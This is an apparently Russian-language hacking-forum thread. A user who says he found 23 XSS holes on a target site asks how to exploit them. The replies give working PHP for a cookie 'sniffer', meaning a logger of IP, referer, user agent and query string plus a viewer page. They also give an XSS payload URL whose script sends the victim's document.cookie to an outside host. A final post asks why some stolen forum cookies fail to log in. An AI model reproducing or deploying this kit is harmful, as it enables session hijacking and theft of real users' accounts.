Издеваешься? Знаешь как найти XSS и не знаешь как запрос составить? Составь запрос, дай жертве ссылку и лови его куки на сниффере.
Я не издеваюсь))Я знаю как XSS найти уже на нужном сайте нашел 23,а как запрос составить и что дальше делать понятия не имею,но хочу научиться
XSS _ttp://hackzona.ru/hz.php?name=News&file=article&sid=5005 _ttp://www.cgisecurity.com/articles/dx27.html _ttp://ha.ckers.org/xss.html _ttp:/thread20140.html _ttp:/thread8038.html _ttp:/thread7124-XSS+FAQ.html К изучению.
sniff.php PHP: <?php $ip=$_SERVER["REMOTE_ADDR"]; $ref=$_SERVER["HTTP_REFERER"]; $ua=$_SERVER["HTTP_USER_AGENT"]; $q=$_SERVER["QUERY_STRING"]; if($ref == "") { $str = "<b>$ip</b> | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================"; } else {$str = "<b>$ip</b> | Пришел с : <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";} $file=fopen("log.txt","a+"); fwrite($file,"$str<br>"); fclose($file); ?> <img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg"> log.php: PHP: <?php echo "<html> <body> <meta http-equiv; charset=windows-1251> <title>WEB Sniffer</title> <body bgcolor=black style=color:red> <h1>WEB SNIFFER</h1> <input type=submit value='Обновить' onClick=javascript:window.location='log.php'> </form> <br><br><br> ======================================================================================================<br>"; if(file_exists("log.txt")) require "log.txt"; echo "<br></body></html>"; ?> http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
Почему некоторыми куками нельзя воспользоваться? Например форум - подставил куки жертвы, выкидывает в Гости...